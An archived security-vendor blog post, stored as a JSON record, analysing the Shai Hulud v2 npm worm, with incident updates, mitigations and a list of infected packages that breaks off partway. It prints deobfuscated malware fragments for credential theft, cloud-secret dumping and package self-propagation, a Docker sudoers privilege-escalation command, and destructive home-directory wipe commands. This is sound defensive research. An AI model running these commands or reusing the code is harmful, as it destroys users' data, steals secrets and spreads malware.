{
	"id": "802424b8-8737-4d7a-8c35-358051ad41bf",
	"created_at": "2026-04-29T02:20:36.487094Z",
	"updated_at": "2026-04-29T08:21:31.348469Z",
	"deleted_at": null,
	"sha1_hash": "3e164d2907d9dc36d7e6cce9b24798e4b0b320ea",
	"title": "Shai Hulud Strikes Again (v2)",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 722929,
	"plain_text": "Shai Hulud Strikes Again (v2)\r\nBy Socket Research Team\r\nPublished: 2025-11-24 · Archived: 2026-04-29 02:09:47 UTC\r\nSecure your dependencies with us\r\nSocket proactively blocks malicious open source packages in your code.\r\nInstall\r\nUpdate: November 26, 2025\r\nPostHog has published a detailed post mortem describing how one of its GitHub Actions workflows\r\nwas abused as an initial access vector for Shai Hulud v2. An attacker briefly opened a pull request that\r\nmodified a script executed via pull_request_target , exfiltrated a bot personal access token from CI,\r\nthen used that access to steal additional GitHub secrets including an npm publish token and ship\r\nhttps://socket.dev/blog/shai-hulud-strikes-again-v2\r\nPage 1 of 29\n\nmalicious versions of several PostHog SDKs. PostHog has since revoked credentials, tightened\r\nworkflow reviews, moved to trusted publishing, and reworked its secrets management. Their write up\r\nhighlights how subtle CI workflow choices can create a path from untrusted contributions to package\r\nrelease credentials.\r\nUpdate: November 25, 2025\r\nThe Shai Hulud v2 campaign has primarily targeted the npm ecosystem, compromising hundreds of\r\npackages and exposing secrets from tens of thousands of GitHub repositories.\r\nWe now also observe a spillover into the Java/Maven ecosystem: the Maven Central package\r\norg.mvnpm:posthog-node:4.18.1 embeds the same Bun-based malicious payload\r\n( bun_environment.js , SHA-1: d60ec97eea19fffb4809bc35b91033b52490ca11 ) and setup_bun.js\r\nloader used in the npm campaign. This means the PostHog project has compromised releases in both\r\nthe JavaScript/npm and Java/Maven ecosystems, driven by the same Shai Hulud v2 payload. We\r\nreported this compromised Maven package version to the Maven Central security team.\r\nAt 18:06 UTC (10:06 PST), the Maven Central team confirmed they were investigating the artifact and\r\nexplained that the org.mvnpm coordinates are produced via an automated mvnpm process that rebuilds\r\nnpm packages as Maven artifacts, and that they are working on additional procedures to prevent already\r\nknown compromised npm components from being rebundled.\r\nAt 18:50 UTC (10:50 PST), the PostHog team confirmed that they do not publish to Maven directly and\r\nthat the malicious npm version had already been removed from npm, with the Maven artifact\r\nrepresenting a mirrored copy of that release.\r\nAt 22:44 UTC (13:44 PST), the Maven Central team reported that they had purged the affected\r\ncomponents from Maven Central and taken steps to prevent any reintroduction of these compromised\r\nartifacts.\r\nMultiple npm packages from @zapier , @asyncapi , @postman , @posthog and @ensdomains have been\r\ncompromised via account takeover/developer compromise. The malicious actor has made the following changes in\r\nthese packages.\r\nAdded a preinstall script setup_bun.js in the package.json file\r\nThe setup_bun.js file is a stealthy loader that silently installs or locates the Bun runtime and then\r\nexecutes a 10MB obfuscated and bundled malicious script ( bun_environment.js ) with all output\r\nsuppressed.\r\nWe will be updating the post with further technical analysis and list of additional packages.\r\nTechnical Analysis#\r\nThe attack uses a two-stage loader. When npm runs the preinstall script, it executes setup_bun.js , which:\r\n1. Detects OS/architecture\r\n2. Downloads or locates the Bun runtime for that platform\r\n3. Caches Bun binary in ~/.cache or equivalent\r\n4. Spawns a detached Bun process running bun_environment.js with POSTINSTALL_BG=1 flag\r\nhttps://socket.dev/blog/shai-hulud-strikes-again-v2\r\nPage 2 of 29\n\n5. Suppresses all stdout/stderr and returns immediately\r\nThe package installation completes normally while the payload runs in the background.\r\nC2 Discovery via GitHub Search#\r\nBefore executing its main payload, the malware attempts self-healing by searching public GitHub repositories for\r\nthe beacon phrase:\r\n\"Sha1-Hulud: The Second Coming.\"\r\nIf found, it:\r\n1. Reads a stored file containing a GitHub access token\r\n2. Decodes it through three layers: base64 → base64 → base64\r\n3. Uses the recovered token as its primary credential for exfiltration\r\nThis makes the malware self-healing—if a victim deletes previous malicious repositories, the attacker can re-seed\r\nvictims through GitHub search. The beacon phrase also serves as a campaign signature for tracking infected\r\nrepositories.\r\nEnvironment Fingerprinting#\r\nThe payload collects system information:\r\nlet _0x5735a8 = {\r\n 'system': {\r\n 'platform': _0x46410c[\"platform\"], // windows/linux/darwin\r\n 'architecture': _0x46410c[\"architecture\"], // x86/x64/arm/arm64\r\n 'hostname': a0_0xf22814[\"hostname\"](),\r\n 'os_user': a0_0xf22814[\"userInfo\"](),\r\n },\r\n 'modules': {\r\n 'github': {\r\n 'authenticated': _0x1b7dd4['isAuthenticated'](),\r\n 'token': _0x1b7dd4['getCurrentToken'](),\r\n 'username': _0x57709e,\r\n },\r\n },\r\n};\r\nIt detects CI/CD environments by checking for:\r\nGITHUB_ACTIONS + RUNNER_OS (executes Ry1() , cQ0() , pQ0() , gQ0() functions)\r\nBUILDKITE\r\nCODEBUILD_BUILD_NUMBER\r\nhttps://socket.dev/blog/shai-hulud-strikes-again-v2\r\nPage 3 of 29\n\nCIRCLE_SHA1\r\nPROJECT_ID\r\nGitHub Actions Runner Privilege Escalation#\r\nOn GitHub Actions runners (Linux only), the malware attempts to gain root access through sudoers manipulation.\r\npQ0() - Sudoers Injection\r\nFirst attempts passwordless sudo:\r\nsudo -n true\r\nIf that fails, exploits Docker privileges to write /etc/sudoers.d/runner :\r\ndocker run --rm --privileged -v /:/host ubuntu bash -c \\\\\r\n\"cp /host/tmp/runner /host/etc/sudoers.d/runner\"\r\nThis grants the malware passwordless root access on GitHub Actions runners.\r\ngQ0() - DNS and Firewall Manipulation\r\nOnce privileged, the malware:\r\n1. Stops systemd-resolved\r\n2. Replaces DNS configuration from /tmp/resolved.conf\r\n3. Restarts the resolver\r\n4. Flushes iptables rules:\r\nsudo iptables -F OUTPUT\r\nsudo iptables -F DOCKER-USER\r\nThis provides network-level control within CI environments, enabling:\r\nMan-in-the-middle attacks inside CI\r\nRedirection of package installs to malicious mirrors\r\nBlocking security scanners from reaching the internet\r\nPrevention of security updates\r\nCredential Collection#\r\n1. Environment Variables\r\nlet _0x5bb75d = { 'environment': process[\"env\"] };\r\nhttps://socket.dev/blog/shai-hulud-strikes-again-v2\r\nPage 4 of 29\n\nCaptures entire environment including GITHUB_TOKEN , NPM_TOKEN , AWS_ACCESS_KEY_ID ,\r\nAWS_SECRET_ACCESS_KEY , and all CI-injected secrets.\r\n2. TruffleHog Filesystem Scan\r\nasync function uy1(_0x5a0845) {\r\n let _0x51fad2 = new Tl();\r\n await _0x51fad2[\"initialize\"]();\r\n let _0x192d24 = await _0x51fad2[\"scanFilesystem\"](a0_0xf22814[\"homedir\"]());\r\n await _0x5a0845['saveContents'](\"truffleSecrets.json\", JSON[\"stringify\"](_0x192d24));\r\n}\r\nThe Tl class:\r\nDownloads TruffleHog binary from github.com/trufflesecurity/trufflehog/releases\r\nCaches it in ~/.truffler-cache\r\nRuns trufflehog filesystem $HOME --json\r\nScans entire home directory for hardcoded secrets\r\n3. Cloud Provider APIs\r\nAWS Multi-Region Enumeration\r\nThe AWS collector ( WX ) aggressively enumerates secrets across all AWS regions, not just the default:\r\n_0x3e4549 = {\r\n 'aws': { 'secrets': await _0x30fddc[\"runSecrets\"]() },\r\n 'gcp': { 'secrets': await _0x79b1b9['listAndRetrieveAllSecrets']() },\r\n 'azure': { 'secrets': await _0x8fa8f[\"listAndRetrieveAllSecrets\"]() },\r\n};\r\nThe AWS module loops through every available region, enumerating and dumping all secret values from AWS\r\nSecrets Manager in each. This regional sweeping is unusually aggressive and significantly increases the credential\r\nharvest in multi-region deployments.\r\nGCP Secret Manager and Azure Key Vault are similarly enumerated to retrieve all accessible secrets.\r\n4. GitHub Actions Secrets with Automated Credential Scraping\r\nasync function ky1(_0x4c25d7) {\r\n if (_0x4c25d7[\"isAuthenticated\"]() \u0026\u0026 await _0x4c25d7[\"checkWorkflowScope\"]()) {\r\n let _0x5b24e2 = new mq(_0x3c6fb2);\r\n let _0x42eae5 = _0x5b24e2[\"userReposUpdatedSince\"]();\r\n for await(let _0x4ed63b of _0x5b24e2['processReposStream'](_0x42eae5))\r\n _0x2b1cf7[\"push\"](_0x4ed63b);\r\nhttps://socket.dev/blog/shai-hulud-strikes-again-v2\r\nPage 5 of 29\n\nreturn await _0x4c25d7[\"saveContents\"](\"actionsSecrets.json\", JSON[\"stringify\"](_0x2b1cf7));\r\n }\r\n}\r\nEnumerates user repositories and extracts GitHub Actions workflow secrets. The malware then mines this data for\r\nNPM tokens (see worm propagation section).\r\nData Exfiltration#\r\nCreates a GitHub repository in the victim's account using the stolen GitHub token. The repository name is\r\nrandomly generated:\r\nfunction tL0() {\r\n return Array[\"from\"]({ 'length': 0x12 }, () =\u003e\r\n Math[\"random\"]()['toString'](0x24)['slice'](0x2, 0x3))['join']('');\r\n}\r\nSome repositories are created with the description: \"Sha1-Hulud: The Second Coming.\" as a campaign marker.\r\nTriple-Base64 Encoding\r\nAll exfiltrated data is encoded through three layers of base64 before upload:\r\ncontent → base64 → base64 → base64\r\nThis serves multiple anti-forensic purposes:\r\nEvades GitHub's built-in secret scanning\r\nBypasses third-party secret detection tools\r\nMakes casual browsing of repository contents ineffective\r\nComplicates forensic analysis of stolen data\r\nUploads five JSON files to the victim's repository:\r\nawait _0x1b7dd4[\"createRepo\"](tL0());\r\n_0x1b7dd4[\"saveContents\"](\"contents.json\", JSON[\"stringify\"](_0x5735a8)); // System info + GitHub creds\r\n_0x1b7dd4[\"saveContents\"](\"environment.json\", JSON[\"stringify\"](_0x5bb75d)); // All env vars\r\n_0x1b7dd4[\"saveContents\"](\"cloud.json\", JSON['stringify'](_0x3e4549)); // AWS/GCP/Azure secrets\r\n_0x1b7dd4[\"saveContents\"](\"truffleSecrets.json\", JSON[\"stringify\"](_0x192d24));// TruffleHog findings\r\n_0x1b7dd4[\"saveContents\"](\"actionsSecrets.json\", JSON[\"stringify\"](_0x2b1cf7));// GitHub Actions secrets\r\nWorm Propagation#\r\nPrimary NPM Token Exploitation\r\nhttps://socket.dev/blog/shai-hulud-strikes-again-v2\r\nPage 6 of 29\n\nasync function El(_0x36c877) {\r\n let _0x23e1d9 = new Wl(_0x36c877);\r\n _0x4012c4 = await _0x23e1d9[\"validateToken\"]();\r\n if (_0x4012c4) {\r\n let _0x8bd950 = await _0x23e1d9['getPackagesByMaintainer'](_0x4012c4, 0x64); // Get up to 100 packages\r\n await Promise[\"all\"](_0x8bd950[\"map\"](async _0x1d876b =\u003e {\r\n await _0x23e1d9['updatePackage'](_0x1d876b);\r\n }));\r\n }\r\n}\r\nFor each valid NPM token:\r\n1. Validates token against npm registry\r\n2. Fetches all packages by that maintainer (max 100)\r\n3. Calls updatePackage() on each package\r\nThe updatePackage() function:\r\nDownloads the package tarball\r\nInjects two new files: setup_bun.js and bun_environment.js\r\nPatches package.json to add the preinstall script\r\nIncrements the patch version ( x.y.z → x.y.z+1 )\r\nPublishes the new malicious version to npm\r\nThe patch-version bumping strategy makes infected packages harder to notice compared to major or minor version\r\nchanges.\r\nSecondary Token Mining from GitHub Actions\r\nBefore giving up, the malware performs automated credential scraping on all GitHub Actions metadata, searching\r\nfor any string that starts with npm_ :\r\nfor (let [_0x11c4f3, _0x402786] of Object['entries'](_0x5998e5)) {\r\n if (typeof _0x402786 === \"string\" \u0026\u0026 _0x402786['startsWith'](\"npm_\")) {\r\n if ((await El(_0x402786))[\"npmTokenValid\"]) {\r\n await Promise[\"all\"]([_0x6e06c0, _0x584734, _0x3adc69, _0x53223d]);\r\n process['exit'](0x0);\r\n }\r\n }\r\n}\r\nThis creates a full CI → NPM takeover chain: compromised GitHub Actions workflows reveal NPM tokens\r\nstored as secrets, which are then used to poison additional packages. This automated pivoting mechanism enables\r\nhttps://socket.dev/blog/shai-hulud-strikes-again-v2\r\nPage 7 of 29\n\nthe worm to bootstrap propagation even without direct NPM_TOKEN environment variables.\r\nDestructive Payload#\r\nIf no GitHub token is available and no NPM token is valid, executes file destruction:\r\nif (console['log'](\"Error 12\"), _0x46410c[\"platform\"] === \"windows\")\r\n Bun[\"spawnSync\"]([\"cmd.exe\", '/c',\r\n \"del /F /Q /S \\\"%USERPROFILE%*\\\" \u0026\u0026 \" +\r\n \"for /d %%i in (\\\"%USERPROFILE%*\\\") do rd /S /Q \\\"%%i\\\" \u0026 \" +\r\n \"cipher /W:%USERPROFILE%\"]);\r\nelse\r\n Bun[\"spawnSync\"]([\"bash\", '-c',\r\n 'find \"$HOME\" -type f -writable -user \"$(id -un)\" -print0 | ' +\r\n 'xargs -0 -r shred -uvz -n 1 \u0026\u0026 ' +\r\n 'find \"$HOME\" -depth -type d -empty -delete']);\r\nWindows: Deletes all files in %USERPROFILE% , removes directories, overwrites free space with cipher /W\r\nLinux/macOS: Finds all writable user files, shreds them with single-pass overwrite, deletes empty directories\r\nStealth Mechanisms#\r\nBackground execution:\r\nif (process[\"env\"][\"POSTINSTALL_BG\"] !== '1') {\r\n Bun['spawn']([_0x4a3fc4, process[\"argv\"][0x1]], {\r\n 'env': { ...process[\"env\"], 'POSTINSTALL_BG': '1' }\r\n })[\"unref\"]();\r\n return;\r\n}\r\nSilent failure:\r\njy1()[\"catch\"](_0x5ddff6 =\u003e {\r\n process[\"exit\"](0x0); // Always exits with success code\r\n});\r\nAll errors exit with code 0, suppressing npm warnings.\r\nMitigations \u0026 Defenses#\r\nIn the first Shai-Hulud Supply Chain compromise, the threat actor originally gained access through a\r\ncompromised maintainer account, and likely did again. It is therefore incredibly pertinent to ensure the safety of\r\nyour CI/CD pipeline.\r\nhttps://socket.dev/blog/shai-hulud-strikes-again-v2\r\nPage 8 of 29\n\nImmediate Actions: If you have any of the packages listed above installed, remove them immediately and delete\r\nyour  node_modules  folder. If these packages were installed in environments with access to secrets or credentials,\r\nrotate all API keys, tokens, and passwords immediately as the malicious code may have exfiltrated sensitive\r\ninformation. Follow OpenJS' guidance and understand the pros and cons to the different approaches to publishing\r\nto npm. Check GitHub for strange repos like those pictured below with the description, “Sha1-Hulud: The Second\r\nComing.”\r\nPrevention:\r\nSocket’s free GitHub app can ensure that whenever a new dependency is added in a pull request, you will be\r\ninformed about the package’s behavior and security risk. Socket Firewall will block malicious dependencies\r\nbefore they reach your machine. Also consider:\r\nUsing package lock files and monitor your CI/CD pipeline continuously.\r\nEnforcing immutable build steps and require review before modifying CI configurations.\r\nRestricting who can trigger publishing workflows.\r\nPreventing CI jobs from accessing unnecessary secrets.\r\nAdding publication verification and require customers to verify provenance before trusting new versions.\r\nIndicators of Compromise#\r\nList of infected packages so far:-\r\n1. @accordproject/concerto-analysis (v3.24.1)\r\n2. @accordproject/concerto-linter (v3.24.1)\r\n3. @accordproject/concerto-linter-default-ruleset (v3.24.1)\r\n4. @accordproject/concerto-metamodel (v3.12.5)\r\n5. @accordproject/concerto-types (v3.24.1)\r\n6. @accordproject/concerto-types (v3.24.1)\r\n7. @accordproject/markdown-it-cicero (v0.16.26)\r\n8. @accordproject/template-engine (v2.7.2)\r\nhttps://socket.dev/blog/shai-hulud-strikes-again-v2\r\nPage 9 of 29\n\n9. @actbase/css-to-react-native-transform (v1.0.3)\r\n10. @actbase/css-to-react-native-transform (v1.0.3)\r\n11. @actbase/native (v0.1.32)\r\n12. @actbase/node-server (v1.1.19)\r\n13. @actbase/react-absolute (v0.8.3)\r\n14. @actbase/react-daum-postcode (v1.0.5)\r\n15. @actbase/react-kakaosdk (v0.9.27)\r\n16. @actbase/react-native-actionsheet (v1.0.3)\r\n17. @actbase/react-native-devtools (v0.1.3)\r\n18. @actbase/react-native-fast-image (v8.5.13)\r\n19. @actbase/react-native-kakao-channel (v1.0.2)\r\n20. @actbase/react-native-kakao-navi (v2.0.4)\r\n21. @actbase/react-native-less-transformer (v1.0.6)\r\n22. @actbase/react-native-naver-login (v1.0.1)\r\n23. @actbase/react-native-simple-video (v1.0.13)\r\n24. @actbase/react-native-tiktok (v1.1.3)\r\n25. @afetcan/api (v0.0.13)\r\n26. @afetcan/storage (v0.0.27)\r\n27. @alaan/s2s-auth (v2.0.3)\r\n28. @alexadark/amadeus-api (v1.0.4)\r\n29. @alexadark/gatsby-theme-events (v1.0.1)\r\n30. @alexadark/gatsby-theme-wordpress-blog (v2.0.1)\r\n31. @alexadark/reusable-functions (v1.5.1)\r\n32. @alexcolls/nuxt-socket.io (v0.0.7, v0.0.8)\r\n33. @alexcolls/nuxt-ux (v0.6.1, v0.6.2)\r\n34. @antstackio/eslint-config-antstack (v0.0.3)\r\n35. @antstackio/express-graphql-proxy (v0.2.8)\r\n36. @antstackio/graphql-body-parser (v0.1.1)\r\n37. @antstackio/json-to-graphql (v1.0.3)\r\n38. @antstackio/shelbysam (v1.1.7)\r\n39. @aryanhussain/my-angular-lib (v0.0.23)\r\n40. @asyncapi/avro-schema-parser (v3.0.25)\r\n41. @asyncapi/avro-schema-parser (v3.0.26)\r\n42. @asyncapi/bundler (v0.6.5, v0.6.6)\r\n43. @asyncapi/bundler (v0.6.6)\r\n44. @asyncapi/cli (v4.1.2)\r\n45. @asyncapi/cli (v4.1.3)\r\n46. @asyncapi/converter (v1.6.3)\r\n47. @asyncapi/converter (v1.6.4)\r\n48. @asyncapi/diff (v0.5.1)\r\n49. @asyncapi/diff (v0.5.2)\r\n50. @asyncapi/dotnet-rabbitmq-template (v1.0.1)\r\nhttps://socket.dev/blog/shai-hulud-strikes-again-v2\r\nPage 10 of 29\n\n51. @asyncapi/dotnet-rabbitmq-template (v1.0.2)\r\n52. @asyncapi/edavisualiser (v1.2.1)\r\n53. @asyncapi/edavisualiser (v1.2.2)\r\n54. @asyncapi/generator (v2.8.5)\r\n55. @asyncapi/generator (v2.8.6)\r\n56. @asyncapi/generator-components (v0.3.2)\r\n57. @asyncapi/generator-components (v0.3.3)\r\n58. @asyncapi/generator-helpers (v0.2.1)\r\n59. @asyncapi/generator-helpers (v0.2.2)\r\n60. @asyncapi/generator-react-sdk (v1.1.4)\r\n61. @asyncapi/generator-react-sdk (v1.1.5)\r\n62. @asyncapi/go-watermill-template (v0.2.76)\r\n63. @asyncapi/go-watermill-template (v0.2.77)\r\n64. @asyncapi/html-template (v3.3.2)\r\n65. @asyncapi/html-template (v3.3.3)\r\n66. @asyncapi/java-spring-cloud-stream-template (v0.13.5)\r\n67. @asyncapi/java-spring-cloud-stream-template (v0.13.6)\r\n68. @asyncapi/java-spring-template (v1.6.1)\r\n69. @asyncapi/java-spring-template (v1.6.2)\r\n70. @asyncapi/java-template (v0.3.5)\r\n71. @asyncapi/java-template (v0.3.6)\r\n72. @asyncapi/keeper (v0.0.2)\r\n73. @asyncapi/keeper (v0.0.3)\r\n74. @asyncapi/markdown-template (v1.6.8, v1.6.9)\r\n75. @asyncapi/modelina (v5.10.2)\r\n76. @asyncapi/modelina (v5.10.3)\r\n77. @asyncapi/modelina-cli (v5.10.2)\r\n78. @asyncapi/modelina-cli (v5.10.3)\r\n79. @asyncapi/multi-parser (v2.2.1)\r\n80. @asyncapi/multi-parser (v2.2.2)\r\n81. @asyncapi/nodejs-template (v3.0.5)\r\n82. @asyncapi/nodejs-template (v3.0.6)\r\n83. @asyncapi/nodejs-ws-template (v0.10.1)\r\n84. @asyncapi/nodejs-ws-template (v0.10.2)\r\n85. @asyncapi/nunjucks-filters (v2.1.1)\r\n86. @asyncapi/nunjucks-filters (v2.1.2)\r\n87. @asyncapi/openapi-schema-parser (v3.0.25)\r\n88. @asyncapi/openapi-schema-parser (v3.0.26)\r\n89. @asyncapi/optimizer (v1.0.5)\r\n90. @asyncapi/optimizer (v1.0.6)\r\n91. @asyncapi/parser (v3.4.1)\r\n92. @asyncapi/parser (v3.4.2)\r\nhttps://socket.dev/blog/shai-hulud-strikes-again-v2\r\nPage 11 of 29\n\n93. @asyncapi/php-template (v0.1.1)\r\n94. @asyncapi/php-template (v0.1.2)\r\n95. @asyncapi/problem (v1.0.1)\r\n96. @asyncapi/problem (v1.0.2)\r\n97. @asyncapi/protobuf-schema-parser (v3.5.2, v3.6.1)\r\n98. @asyncapi/protobuf-schema-parser (v3.5.3)\r\n99. @asyncapi/python-paho-template (v0.2.14)\r\n100. @asyncapi/python-paho-template (v0.2.15)\r\n101. @asyncapi/react-component (v2.6.6)\r\n102. @asyncapi/react-component (v2.6.7)\r\n103. @asyncapi/server-api (v0.16.24)\r\n104. @asyncapi/server-api (v0.16.25)\r\n105. @asyncapi/specs (v6.8.2, v6.9.1, v6.10.1)\r\n106. @asyncapi/specs (v6.8.3)\r\n107. @asyncapi/studio (v1.0.2)\r\n108. @asyncapi/studio (v1.0.3)\r\n109. @asyncapi/web-component (v2.6.6)\r\n110. @asyncapi/web-component (v2.6.7)\r\n111. @bdkinc/knex-ibmi (v0.5.7)\r\n112. @browserbasehq/bb9 (v1.2.21)\r\n113. @browserbasehq/director-ai (v1.0.3)\r\n114. @browserbasehq/mcp (v2.1.1)\r\n115. @browserbasehq/mcp-server-browserbase (v2.4.2)\r\n116. @browserbasehq/sdk-functions (v0.0.4)\r\n117. @browserbasehq/stagehand (v3.0.4)\r\n118. @browserbasehq/stagehand-docs (v1.0.1)\r\n119. @caretive/caret-cli (v0.0.2)\r\n120. @chtijs/eslint-config (v1.0.1)\r\n121. @clausehq/flows-step-httprequest (v0.1.14)\r\n122. @clausehq/flows-step-jsontoxml (v0.1.14)\r\n123. @clausehq/flows-step-mqtt (v0.1.14)\r\n124. @clausehq/flows-step-sendgridemail (v0.1.14)\r\n125. @clausehq/flows-step-taskscreateurl (v0.1.14)\r\n126. @cllbk/ghl (v1.3.1)\r\n127. @commute/bloom (v1.0.3)\r\n128. @commute/market-data (v1.0.2)\r\n129. @commute/market-data-chartjs (v2.3.1)\r\n130. @dev-blinq/ai-qa-logic (v1.0.19)\r\n131. @dev-blinq/blinqioclient (v1.0.21)\r\n132. @dev-blinq/cucumber_client (v1.0.738)\r\n133. @dev-blinq/cucumber-js (v1.0.131)\r\n134. @dev-blinq/ui-systems (v1.0.93)\r\nhttps://socket.dev/blog/shai-hulud-strikes-again-v2\r\nPage 12 of 29\n\n135. @ensdomains/address-encoder (v1.1.5)\r\n136. @ensdomains/blacklist (v1.0.1)\r\n137. @ensdomains/buffer (v0.1.2)\r\n138. @ensdomains/ccip-read-cf-worker (v0.0.4)\r\n139. @ensdomains/ccip-read-dns-gateway (v0.1.1)\r\n140. @ensdomains/ccip-read-router (v0.0.7)\r\n141. @ensdomains/ccip-read-worker-viem (v0.0.4)\r\n142. @ensdomains/content-hash (v3.0.1)\r\n143. @ensdomains/curvearithmetics (v1.0.1)\r\n144. @ensdomains/cypress-metamask (v1.2.1)\r\n145. @ensdomains/dnsprovejs (v0.5.3)\r\n146. @ensdomains/dnssec-oracle-anchors (v0.0.2)\r\n147. @ensdomains/dnssecoraclejs (v0.2.9)\r\n148. @ensdomains/durin (v0.1.2)\r\n149. @ensdomains/durin-middleware (v0.0.2)\r\n150. @ensdomains/ens-archived-contracts (v0.0.3)\r\n151. @ensdomains/ens-avatar (v1.0.4)\r\n152. @ensdomains/ens-contracts (v1.6.1)\r\n153. @ensdomains/ens-test-env (v1.0.2)\r\n154. @ensdomains/ens-validation (v0.1.1)\r\n155. @ensdomains/ensjs (v4.0.3)\r\n156. @ensdomains/ensjs-react (v0.0.5)\r\n157. @ensdomains/eth-ens-namehash (v2.0.16)\r\n158. @ensdomains/hackathon-registrar (v1.0.5)\r\n159. @ensdomains/hardhat-chai-matchers-viem (v0.1.15)\r\n160. @ensdomains/hardhat-toolbox-viem-extended (v0.0.6)\r\n161. @ensdomains/mock (v2.1.52)\r\n162. @ensdomains/name-wrapper (v1.0.1)\r\n163. @ensdomains/offchain-resolver-contracts (v0.2.2)\r\n164. @ensdomains/op-resolver-contracts (v0.0.2)\r\n165. @ensdomains/react-ens-address (v0.0.32)\r\n166. @ensdomains/renewal (v0.0.13)\r\n167. @ensdomains/renewal-widget (v0.1.10)\r\n168. @ensdomains/reverse-records (v1.0.1)\r\n169. @ensdomains/server-analytics (v0.0.2)\r\n170. @ensdomains/solsha1 (v0.0.4)\r\n171. @ensdomains/subdomain-registrar (v0.2.4)\r\n172. @ensdomains/test-utils (v1.3.1)\r\n173. @ensdomains/thorin (v0.6.51)\r\n174. @ensdomains/ui (v3.4.6)\r\n175. @ensdomains/unicode-confusables (v0.1.1)\r\n176. @ensdomains/unruggable-gateways (v0.0.3)\r\nhttps://socket.dev/blog/shai-hulud-strikes-again-v2\r\nPage 13 of 29\n\n177. @ensdomains/vite-plugin-i18next-loader (v4.0.4)\r\n178. @ensdomains/web3modal (v1.10.2)\r\n179. @everreal/react-charts (v2.0.1)\r\n180. @everreal/react-charts (v2.0.2)\r\n181. @everreal/validate-esmoduleinterop-imports (v1.4.4, v1.4.5)\r\n182. @everreal/web-analytics (v0.0.1, v0.0.2)\r\n183. @faq-component/core (v0.0.4)\r\n184. @faq-component/react (v1.0.1)\r\n185. @fishingbooker/browser-sync-plugin (v1.0.5)\r\n186. @fishingbooker/react-loader (v1.0.7)\r\n187. @fishingbooker/react-pagination (v2.0.6)\r\n188. @fishingbooker/react-raty (v2.0.1)\r\n189. @fishingbooker/react-swiper (v0.1.5)\r\n190. @hapheus/n8n-nodes-pgp (v1.5.1)\r\n191. @hover-design/core (v0.0.1)\r\n192. @hover-design/react (v0.2.1)\r\n193. @huntersofbook/auth-vue (v0.4.2)\r\n194. @huntersofbook/core (v0.5.1)\r\n195. @huntersofbook/core-nuxt (v0.4.2)\r\n196. @huntersofbook/form-naiveui (v0.5.1)\r\n197. @huntersofbook/i18n (v0.8.2)\r\n198. @huntersofbook/ui (v0.5.1)\r\n199. @hyperlook/telemetry-sdk (v1.0.19)\r\n200. @ifelsedeveloper/protocol-contracts-svm-idl (v0.1.2)\r\n201. @ifelsedeveloper/protocol-contracts-svm-idl (v0.1.3)\r\n202. @ifings/design-system (v4.9.2)\r\n203. @ifings/metatron3 (v0.1.5)\r\n204. @jayeshsadhwani/telemetry-sdk (v1.0.14)\r\n205. @kvytech/cli (v0.0.7)\r\n206. @kvytech/components (v0.0.2)\r\n207. @kvytech/habbit-e2e-test (v0.0.2)\r\n208. @kvytech/medusa-plugin-announcement (v0.0.8)\r\n209. @kvytech/medusa-plugin-management (v0.0.5)\r\n210. @kvytech/medusa-plugin-newsletter (v0.0.5)\r\n211. @kvytech/medusa-plugin-product-reviews (v0.0.9)\r\n212. @kvytech/medusa-plugin-promotion (v0.0.2)\r\n213. @kvytech/web (v0.0.2)\r\n214. @lessondesk/api-client (v9.12.2)\r\n215. @lessondesk/api-client (v9.12.3)\r\n216. @lessondesk/babel-preset (v1.0.1)\r\n217. @lessondesk/electron-group-api-client (v1.0.3)\r\n218. @lessondesk/eslint-config (v1.4.2)\r\nhttps://socket.dev/blog/shai-hulud-strikes-again-v2\r\nPage 14 of 29\n\n219. @lessondesk/material-icons (v1.0.3)\r\n220. @lessondesk/react-table-context (v2.0.4)\r\n221. @lessondesk/schoolbus (v5.2.2, v5.2.3)\r\n222. @livecms/live-edit (v0.0.32)\r\n223. @livecms/nuxt-live-edit (v1.9.2)\r\n224. @lokeswari-satyanarayanan/rn-zustand-expo-template (v1.0.9)\r\n225. @louisle2/core (v1.0.1)\r\n226. @louisle2/cortex-js (v0.1.6)\r\n227. @lpdjs/firestore-repo-service (v1.0.1)\r\n228. @lui-ui/lui-nuxt (v0.1.1)\r\n229. @lui-ui/lui-tailwindcss (v0.1.2)\r\n230. @lui-ui/lui-vue (v1.0.13)\r\n231. @markvivanco/app-version-checker (v1.0.1, v1.0.2)\r\n232. @mcp-use/cli (v2.2.6, v2.2.7)\r\n233. @mcp-use/inspector (v0.6.2, v0.6.3)\r\n234. @mcp-use/mcp-use (v1.0.1, v1.0.2)\r\n235. @micado-digital/stadtmarketing-kufstein-external (v1.9.1)\r\n236. @mizzle-dev/orm (v0.0.2)\r\n237. @ntnx/passport-wso2 (v0.0.3)\r\n238. @ntnx/t (v0.0.101)\r\n239. @oku-ui/accordion (v0.6.2)\r\n240. @oku-ui/alert-dialog (v0.6.2)\r\n241. @oku-ui/arrow (v0.6.2)\r\n242. @oku-ui/aspect-ratio (v0.6.2)\r\n243. @oku-ui/avatar (v0.6.2)\r\n244. @oku-ui/checkbox (v0.6.3)\r\n245. @oku-ui/collapsible (v0.6.2)\r\n246. @oku-ui/collection (v0.6.2)\r\n247. @oku-ui/dialog (v0.6.2)\r\n248. @oku-ui/direction (v0.6.2)\r\n249. @oku-ui/dismissable-layer (v0.6.2)\r\n250. @oku-ui/focus-guards (v0.6.2)\r\n251. @oku-ui/focus-scope (v0.6.2)\r\n252. @oku-ui/hover-card (v0.6.2)\r\n253. @oku-ui/label (v0.6.2)\r\n254. @oku-ui/menu (v0.6.2)\r\n255. @oku-ui/motion (v0.4.4)\r\n256. @oku-ui/motion-nuxt (v0.2.2)\r\n257. @oku-ui/popover (v0.6.2)\r\n258. @oku-ui/popper (v0.6.2)\r\n259. @oku-ui/portal (v0.6.2)\r\n260. @oku-ui/presence (v0.6.2)\r\nhttps://socket.dev/blog/shai-hulud-strikes-again-v2\r\nPage 15 of 29\n\n261. @oku-ui/primitive (v0.6.2)\r\n262. @oku-ui/primitives (v0.7.9)\r\n263. @oku-ui/primitives-nuxt (v0.3.1)\r\n264. @oku-ui/progress (v0.6.2)\r\n265. @oku-ui/provide (v0.6.2)\r\n266. @oku-ui/radio-group (v0.6.2)\r\n267. @oku-ui/roving-focus (v0.6.2)\r\n268. @oku-ui/scroll-area (v0.6.2)\r\n269. @oku-ui/separator (v0.6.2)\r\n270. @oku-ui/slider (v0.6.2)\r\n271. @oku-ui/slot (v0.6.2)\r\n272. @oku-ui/switch (v0.6.2)\r\n273. @oku-ui/tabs (v0.6.2)\r\n274. @oku-ui/toast 